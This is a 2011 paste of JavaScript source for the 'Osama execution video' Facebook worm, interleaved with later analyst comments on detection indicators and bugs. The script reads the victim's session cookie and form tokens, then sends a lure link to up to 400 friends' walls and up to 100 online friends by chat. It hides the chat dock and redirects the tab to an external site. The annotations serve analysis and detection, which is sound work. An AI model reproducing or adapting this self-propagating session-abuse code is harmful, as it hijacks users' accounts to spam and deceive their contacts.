Yarukinasu

Osama Facebook Worm

May 6th, 2011
  1. //alert('Photo Uploaded! Please wait 1-2 minutes without leaving this page until we process your picture!');
  2.  
  // readCookie(name): returns the value of the first document.cookie entry that starts
  // with "name=" once its leading spaces are stripped, or null when no entry matches.
  // The only call in this listing is readCookie("c_user"); the result is later sent as
  // the viewer/user parameter of the friend-list and buddy-list requests.
  3. function readCookie(name)
  4. {
  5.     var nameEQ = name + "=";
  6.     var ca = document.cookie.split(';');
  7.  
  8.     for (var i=0;i < ca.length;i++) {
  9.         var c = ca[i];
  10.        
              // Drop the leading spaces left over from splitting on ';'.
  11.         while (c.charAt(0)==' ') {
  12.             c = c.substring(1,c.length);
  13.         }
  14.        
              // Prefix match: the entry must begin with "name=".
  15.         if (c.indexOf(nameEQ) == 0) {
  16.             return c.substring(nameEQ.length,c.length);
  17.         }
  18.     }
  19.    
  20.     return null;
  21. }
  22.  
  // Session context. Every value here is read from the page the script is running in,
  // so the requests further down are issued from the logged-in user's own origin and
  // session rather than from a third-party site.
  23. var user_id = readCookie("c_user");
  24.  
  25. // Setup some variables
  26.  
  // NOTE(review): post_form_id and fb_dtsg look like the per-session form tokens the site
  // expects on state-changing requests (confirm against the platform's documentation).
  // They are copied from the live DOM and echoed into every POST below, which is why a
  // token check alone cannot distinguish these requests from ones the page itself makes.
  // If either element is absent, [0] is undefined, .value throws, and nothing below runs.
  27. var post_form_id = document.getElementsByName('post_form_id')[0].value;
  28. var fb_dtsg   = document.getElementsByName('fb_dtsg')[0].value;
  29.  
  30. // Chat message variables
  31.  
  // All four entries are the same URL, so the random index used below never changes the
  // link that is sent. Indicator: this page URL appears in both the chat text and the
  // wall-post attachment fields.
  32. var linkies = [
  33.     "http://www.facebook.com/Osama.Gets.Shot.Down",
  34.     "http://www.facebook.com/Osama.Gets.Shot.Down",
  35.     "http://www.facebook.com/Osama.Gets.Shot.Down",
  36.     "http://www.facebook.com/Osama.Gets.Shot.Down"
  37. ]
  38.  
  // Lure text for the chat stage. Only this string is passed through encodeURIComponent;
  // the wall-post fields further down are concatenated into the form body unencoded.
  39. var this_chat    = "Watch Osama's EXECUTION Video! " + linkies[Math.floor(Math.random()*linkies.length)];
  40. var prepared_chat = encodeURIComponent(this_chat);
  41.  
  42. //
  43. // Post Link to friends walls
  44. //
  // Stage 1 of the sample. Requests the viewer's friend list from the typeahead endpoint
  // and, for up to 400 entries, sends one composer POST per friend with the same link
  // attachment. All requests are asynchronous and their responses are ignored.
  // Detection note: the visible network pattern is one session issuing a burst of
  // composer.php POSTs whose title, description, picture and favicon values are identical;
  // the hard-coded values in paramswp below are stable strings for signatures.
  45.  
  // Current Unix time in seconds; sent below as token=<time>-6.
  46. var token = Math.round(new Date().getTime() / 1000);
  47.  
  48. var http1 = new XMLHttpRequest();
  49.  
  50. var url1 = "http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer="+user_id+"&token="+token+"-6&filter[0]=user&options[0]=friends_only";
  51.  
  52. var params1 = "";
  53.  
  // url1 already carries a query string and params1 is empty, so the request URL ends
  // with a stray "?" — a small artefact that can help match this exact sample.
  54. http1.open("GET", url1+"?"+params1, true);
  55. http1.onreadystatechange = function() //Call a function when the state changes.
  56. {
  57.     if (http1.readyState == 4 && http1.status == 200) { // If state = success
  58.         var response1 = http1.responseText;
  59.  
  60.         response1 = response1.replace("for (;;);", ""); // Get rid of the junk at the beginning of the returned object
  61.         response1 = JSON.parse(response1); // Convert the response to JSON
  62.  
  63.         //alert(response4.toSource());
  64.  
  65.         var count = 0;
  66.  
          // `uid` is never declared (implicit global) and never read; the entries are
          // addressed through the running counter instead. The counter caps the run at
          // 400 posts.
  67.         for (uid in response1.payload.entries) {
  68.             if (count < 400) {
  69.                 //alert("SENT TO "+response1.payload.entries[count].uid);
  70.  
  71.                 // Loop to send messages
  72.  
  73.                 // New XMLHttp object
  74.                 var httpwp = new XMLHttpRequest();
  75.  
  76.                 var urlwp = "http://www.facebook.com/ajax/profile/composer.php?__a=1";
  77.  
                  // Lure strings shown in the wall post ("compund" is the author's spelling).
  78.                 var statusmessage="Disturbing Yet Awesome!";
  79.                 var title="Bin Laden EXECUTION Video! Yes it's REAL!";
  80.                 var link=linkies[Math.floor(Math.random()*linkies.length)];
  81.                 var description="Commandos attack Bin Laden's compund and take him out!";
  82.                 var picture="http://i.imgur.com/yTjtU.jpg";
  83.  
                  // Form body built by raw string concatenation: title, description,
                  // statusmessage, link and picture are inserted without URL-encoding, and a
                  // literal ")" follows each statusmessage. Hard-coded values that recur in
                  // every post: xhpc_composerid=u574553_1, app_id=2309869772,
                  // scrape_time=1302991496 and the favicon host 20-y-rr-z.info.
                  // xhpc_targetid is the uid of the friend at index `count`.
  84.                 var paramswp = "post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&xhpc_composerid=u574553_1&xhpc_targetid="+response1.payload.entries[count].uid+"&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]="+title+"&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]="+link+"&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]="+title+"&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]="+picture+"&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]="+description+"&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]="+description+"&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]="+link+"&attachment[params][favicon]=http%3A%2F%2F20-y-rr-z.info%2Ffavicon.ico&attachment[params][title]="+title+"&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]="+description+"&attachment[params][url]="+link+"&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]="+description+"&attachment[params][images][0]="+picture+"&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text="+statusmessage+")&xhpc_message="+statusmessage+")&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest";
  85.  
  86.                 httpwp.open("POST", urlwp, true);
  87.  
  88.                 //Send the proper header information along with the request
  89.  
                  // Content-length and Connection are forbidden request headers for
                  // XMLHttpRequest: the browser sets them itself and does not honour these calls.
  90.                 httpwp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  91.                 httpwp.setRequestHeader("Content-length", paramswp.length);
  92.                 httpwp.setRequestHeader("Connection", "keep-alive");
  93.  
                  // The handler does nothing: its body holds only commented-out alerts, so
                  // the outcome of each post is never checked.
  94.                 httpwp.onreadystatechange = function() //Call a function when the state changes.
  95.                 {
  96.                     if (httpwp.readyState == 4 && httpwp.status == 200) {
  97.                         //alert(http.responseText);
  98.                         //alert('buddy list fetched');
  99.                     }
  100.                 }
  101.  
  102.                 httpwp.send(paramswp);
  103.             }
  104.  
  105.             count++; // increment counter
  106.         }
  107.  
           // Property read, not a call: this statement has no effect.
  108.         http1.close; // Close the connection
  109.     }
  110. }
  111.  
  112. http1.send(null);
  113.  
  114. //
  115. // Hide chat boxes
  116. //
  // Stage 2 of the sample. Sets display:none on the element with id fbDockChatTabSlider.
  // NOTE(review): presumably this keeps the chat messages sent in the next stage from
  // showing up as open tabs on the victim's screen — confirm against the 2011 page layout.
  // If the element does not exist, getElementById returns null, the style access throws,
  // and the chat stage below never runs; the friend-list request above has already been
  // sent by then.
  117.  
  118. var hide = document.getElementById('fbDockChatTabSlider');
  119.  
  120. hide.style.display = "none";
  121.  
  122. //
  123. // Get online friends and send chat message to them
  124. //
  // Stage 3 of the sample. POSTs to the buddy-list endpoint and, for up to 100 keys of
  // payload.buddy_list.nowAvailableList, POSTs the URL-encoded lure text to chat/send.php
  // with that key as the recipient. Requests are asynchronous; responses are ignored.
  // Detection note: one session sending the same msg_text to many recipients within a
  // few seconds is the visible pattern.
  125.  
  126. var http3 = new XMLHttpRequest();
  127.  
  128. var url3 = "http://www.facebook.com/ajax/chat/buddy_list.php?__a=1";
  129. var params3 = "user="+user_id+"&popped_out=false&force_render=true&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
  130. http3.open("POST", url3, true);
  131.  
  132. //Send the proper header information along with the request
  // Content-length and Connection are forbidden request headers for XMLHttpRequest: the
  // browser sets them itself and does not honour these calls.
  133. http3.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  134. http3.setRequestHeader("Content-length", params3.length);
  135. http3.setRequestHeader("Connection", "close");
  136.  
  137. http3.onreadystatechange = function() //Call a function when the state changes.
  138. {
  139.     if (http3.readyState == 4 && http3.status == 200) {
  140.         var response3 = http3.responseText;
  141.  
           // Strip the "for (;;);" prefix on the response before parsing it as JSON.
  142.         response3 = response3.replace("for (;;);", "");
  143.         response3 = JSON.parse(response3);
  144.  
  145.         var count = 0;
  146.  
           // `property` is never declared (implicit global); each key of nowAvailableList
           // is used directly as the `to` value. The counter caps the run at 100 messages.
  147.         for (property in response3.payload.buddy_list.nowAvailableList) {
  148.             if(count < 100) {
  149.                 // Loop to send messages
  150.  
  151.                 // New XMLHttp object
  152.                 var httpc = new XMLHttpRequest();
  153.  
  154.                 // Generate random message ID
  155.  
                   // Yields an integer from 0 to 99, so ids can repeat within one run.
  156.                 var msgid = Math.floor(Math.random()*100);
  157.  
                   // Unix time in seconds, sent as both client_time and pvs_time.
  158.                 var time = Math.round(new Date().getTime() / 1000);
  159.  
  160.                 var urlc = "http://www.facebook.com/ajax/chat/send.php?__a=1";
  161.                 var paramsc = "msg_id="+msgid+"&client_time="+time+"&to="+property+"&num_tabs=1&pvs_time="+time+"&msg_text="+prepared_chat+"&to_offline=false&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest";
  162.                 httpc.open("POST", urlc, true);
  163.  
  164.                 //Send the proper header information along with the request
  165.                 httpc.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  166.                 httpc.setRequestHeader("Content-length", paramsc.length);
  167.                 httpc.setRequestHeader("Connection", "close");
  168.  
                   // The handler does nothing: its body holds only commented-out alerts.
  169.                 httpc.onreadystatechange = function() //Call a function when the state changes.
  170.                 {
  171.                     if(httpc.readyState == 4 && httpc.status == 200) {
  172.                         //alert(http.responseText);
  173.                         //alert('buddy list fetched');
  174.                     }
  175.                 }
  176.                
  177.                 httpc.send(paramsc);
  178.             }
  179.  
  180.             //alert(property);
  181.             count++; // increment counter
  182.         }
  183.  
           // Property read, not a call: this statement has no effect.
  184.         http3.close; // Close the connection
  185.     }
  186. }
  187.  
  188. http3.send(params3);
  189.  
  190. /*
  191. //
  192. // Become a Fan - MW GIVEAWAY
  193. //
  194.  
  195. var http4 = new XMLHttpRequest();
  196.  
  197. var url4 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
  198.  
  199. var params4 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
  200.  
  201. http4.open("POST", url4, true);
  202.  
  203. //Send the proper header information along with the request
  204. http4.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  205. http4.setRequestHeader("Content-length", params4.length);
  206. http4.setRequestHeader("Connection", "close");
  207.  
  208. http4.onreadystatechange = function() //Call a function when the state changes.
  209. {
  210.     if (http4.readyState == 4 && http4.status == 200) {
  211.         http4.close; // Close the connection
  212.     }
  213. }
  214.  
  215. http4.send(params4);
  216.  
  217. //
  218. // Become a Fan - MW GIft
  219. //
  220.  
  221. var http5 = new XMLHttpRequest();
  222.  
  223. var url5 = "http://www.facebook.com/ajax/pages/fan_status.php?__a=1";
  224.  
  225. var params5 = "fbpage_id=217981564879947&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id="+post_form_id+"&fb_dtsg="+fb_dtsg+"&lsd&post_form_id_source=AsyncRequest"
  226.  
  227. http5.open("POST", url5, true);
  228.  
  229. //Send the proper header information along with the request
  230. http5.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
  231. http5.setRequestHeader("Content-length", params5.length);
  232. http5.setRequestHeader("Connection", "close");
  233.  
  234. http5.onreadystatechange = function() //Call a function when the state changes.
  235. {
  236.     if (http5.readyState == 4 && http5.status == 200) {
  237.         http5.close; // Close the connection
  238.     }
  239. }
  240.  
  241. http5.send(params5);
  242. */
  243.  
  // Final stage of the sample: cover and redirect. Overwrites the element with id
  // contentArea with a remotely hosted spinner image and "Please wait...", then after
  // 15000 ms navigates the tab to an external page. setTimeout is given a string, which
  // the browser evaluates as script.
  // NOTE(review): the delay presumably keeps the tab open while the queued requests go
  // out, which matches the commented-out "wait 1-2 minutes" alert at the top of the paste.
  // Indicators: osama.mytopanswers.info (landing page). The hindustantimes.com spinner
  // appears to be a hot-linked third-party asset rather than attacker infrastructure —
  // treat it as weak evidence on its own.
  244. //document.getElementById('susta').style.display="none";
  245. document.getElementById('contentArea').innerHTML="<center><br><br><br><br><br><br><br><br><img src=\"http://www.hindustantimes.com/images/loading_gif.gif\" /><br />Please wait...</center>";
  246. setTimeout("window.location = 'http://osama.mytopanswers.info/video.htm';", 15000);